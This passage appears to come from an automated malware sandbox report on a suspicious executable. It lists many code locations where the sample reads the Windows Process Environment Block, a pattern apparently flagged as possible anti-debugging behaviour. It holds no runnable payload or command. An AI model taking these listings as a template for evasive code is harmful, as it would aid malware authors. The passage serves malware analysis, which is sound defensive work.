              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE53E mov eax, dword ptr fs:[00000030h]3_2_010EE53E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0535 mov eax, dword ptr fs:[00000030h]3_2_010D0535
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8550 mov eax, dword ptr fs:[00000030h]3_2_010C8550
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F656A mov eax, dword ptr fs:[00000030h]3_2_010F656A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F4588 mov eax, dword ptr fs:[00000030h]3_2_010F4588
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C2582 mov eax, dword ptr fs:[00000030h]3_2_010C2582
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C2582 mov ecx, dword ptr fs:[00000030h]3_2_010C2582
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE59C mov eax, dword ptr fs:[00000030h]3_2_010FE59C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011405A7 mov eax, dword ptr fs:[00000030h]3_2_011405A7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E45B1 mov eax, dword ptr fs:[00000030h]3_2_010E45B1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE5CF mov eax, dword ptr fs:[00000030h]3_2_010FE5CF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C65D0 mov eax, dword ptr fs:[00000030h]3_2_010C65D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA5D0 mov eax, dword ptr fs:[00000030h]3_2_010FA5D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC5ED mov eax, dword ptr fs:[00000030h]3_2_010FC5ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EE5E7 mov eax, dword ptr fs:[00000030h]3_2_010EE5E7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C25E0 mov eax, dword ptr fs:[00000030h]3_2_010C25E0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8402 mov eax, dword ptr fs:[00000030h]3_2_010F8402
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BE420 mov eax, dword ptr fs:[00000030h]3_2_010BE420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010BC427 mov eax, dword ptr fs:[00000030h]3_2_010BC427
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01146420 mov eax, dword ptr fs:[00000030h]3_2_01146420
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA430 mov eax, dword ptr fs:[00000030h]3_2_010FA430
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117A456 mov eax, dword ptr fs:[00000030h]3_2_0117A456
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E245A mov eax, dword ptr fs:[00000030h]3_2_010E245A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B645D mov eax, dword ptr fs:[00000030h]3_2_010B645D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C460 mov ecx, dword ptr fs:[00000030h]3_2_0114C460
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0117A49A mov eax, dword ptr fs:[00000030h]3_2_0117A49A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114A4B0 mov eax, dword ptr fs:[00000030h]3_2_0114A4B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C64AB mov eax, dword ptr fs:[00000030h]3_2_010C64AB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F44B0 mov ecx, dword ptr fs:[00000030h]3_2_010F44B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C04E5 mov ecx, dword ptr fs:[00000030h]3_2_010C04E5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC700 mov eax, dword ptr fs:[00000030h]3_2_010FC700
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0710 mov eax, dword ptr fs:[00000030h]3_2_010C0710
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F0710 mov eax, dword ptr fs:[00000030h]3_2_010F0710
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113C730 mov eax, dword ptr fs:[00000030h]3_2_0113C730
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC720 mov eax, dword ptr fs:[00000030h]3_2_010FC720
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC720 mov eax, dword ptr fs:[00000030h]3_2_010FC720
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F273C mov eax, dword ptr fs:[00000030h]3_2_010F273C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F273C mov ecx, dword ptr fs:[00000030h]3_2_010F273C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F273C mov eax, dword ptr fs:[00000030h]3_2_010F273C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102750 mov eax, dword ptr fs:[00000030h]3_2_01102750
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102750 mov eax, dword ptr fs:[00000030h]3_2_01102750
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01144755 mov eax, dword ptr fs:[00000030h]3_2_01144755
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F674D mov esi, dword ptr fs:[00000030h]3_2_010F674D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F674D mov eax, dword ptr fs:[00000030h]3_2_010F674D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F674D mov eax, dword ptr fs:[00000030h]3_2_010F674D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E75D mov eax, dword ptr fs:[00000030h]3_2_0114E75D
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C0750 mov eax, dword ptr fs:[00000030h]3_2_010C0750
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C8770 mov eax, dword ptr fs:[00000030h]3_2_010C8770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]3_2_010D0770
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0116678E mov eax, dword ptr fs:[00000030h]3_2_0116678E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C07AF mov eax, dword ptr fs:[00000030h]3_2_010C07AF
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011747A0 mov eax, dword ptr fs:[00000030h]3_2_011747A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CC7C0 mov eax, dword ptr fs:[00000030h]3_2_010CC7C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011407C3 mov eax, dword ptr fs:[00000030h]3_2_011407C3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h]3_2_010E27ED
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E7E1 mov eax, dword ptr fs:[00000030h]3_2_0114E7E1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C47FB mov eax, dword ptr fs:[00000030h]3_2_010C47FB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C47FB mov eax, dword ptr fs:[00000030h]3_2_010C47FB
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D260B mov eax, dword ptr fs:[00000030h]3_2_010D260B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01102619 mov eax, dword ptr fs:[00000030h]3_2_01102619
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E609 mov eax, dword ptr fs:[00000030h]3_2_0113E609
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C262C mov eax, dword ptr fs:[00000030h]3_2_010C262C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DE627 mov eax, dword ptr fs:[00000030h]3_2_010DE627
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F6620 mov eax, dword ptr fs:[00000030h]3_2_010F6620
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F8620 mov eax, dword ptr fs:[00000030h]3_2_010F8620
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010DC640 mov eax, dword ptr fs:[00000030h]3_2_010DC640
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA660 mov eax, dword ptr fs:[00000030h]3_2_010FA660
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA660 mov eax, dword ptr fs:[00000030h]3_2_010FA660
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118866E mov eax, dword ptr fs:[00000030h]3_2_0118866E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118866E mov eax, dword ptr fs:[00000030h]3_2_0118866E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F2674 mov eax, dword ptr fs:[00000030h]3_2_010F2674
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4690 mov eax, dword ptr fs:[00000030h]3_2_010C4690
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C4690 mov eax, dword ptr fs:[00000030h]3_2_010C4690
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FC6A6 mov eax, dword ptr fs:[00000030h]3_2_010FC6A6
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F66B0 mov eax, dword ptr fs:[00000030h]3_2_010F66B0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]3_2_010FA6C7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010FA6C7 mov eax, dword ptr fs:[00000030h]3_2_010FA6C7
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h]3_2_0113E6F2
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011406F1 mov eax, dword ptr fs:[00000030h]3_2_011406F1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011406F1 mov eax, dword ptr fs:[00000030h]3_2_011406F1
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C912 mov eax, dword ptr fs:[00000030h]3_2_0114C912
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8918 mov eax, dword ptr fs:[00000030h]3_2_010B8918
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010B8918 mov eax, dword ptr fs:[00000030h]3_2_010B8918
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E908 mov eax, dword ptr fs:[00000030h]3_2_0113E908
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0113E908 mov eax, dword ptr fs:[00000030h]3_2_0113E908
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114892A mov eax, dword ptr fs:[00000030h]3_2_0114892A
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0115892B mov eax, dword ptr fs:[00000030h]3_2_0115892B
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01140946 mov eax, dword ptr fs:[00000030h]3_2_01140946
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194940 mov eax, dword ptr fs:[00000030h]3_2_01194940
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114C97C mov eax, dword ptr fs:[00000030h]3_2_0114C97C
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h]3_2_010E6962
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01164978 mov eax, dword ptr fs:[00000030h]3_2_01164978
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01164978 mov eax, dword ptr fs:[00000030h]3_2_01164978
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110096E mov eax, dword ptr fs:[00000030h]3_2_0110096E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110096E mov edx, dword ptr fs:[00000030h]3_2_0110096E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0110096E mov eax, dword ptr fs:[00000030h]3_2_0110096E
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C09AD mov eax, dword ptr fs:[00000030h]3_2_010C09AD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010C09AD mov eax, dword ptr fs:[00000030h]3_2_010C09AD
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011489B3 mov esi, dword ptr fs:[00000030h]3_2_011489B3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011489B3 mov eax, dword ptr fs:[00000030h]3_2_011489B3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011489B3 mov eax, dword ptr fs:[00000030h]3_2_011489B3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h]3_2_010D29A0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0118A9D3 mov eax, dword ptr fs:[00000030h]3_2_0118A9D3
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_011569C0 mov eax, dword ptr fs:[00000030h]3_2_011569C0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h]3_2_010CA9D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010F49D0 mov eax, dword ptr fs:[00000030h]3_2_010F49D0
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_0114E9E0 mov eax, dword ptr fs:[00000030h]3_2_0114E9E0
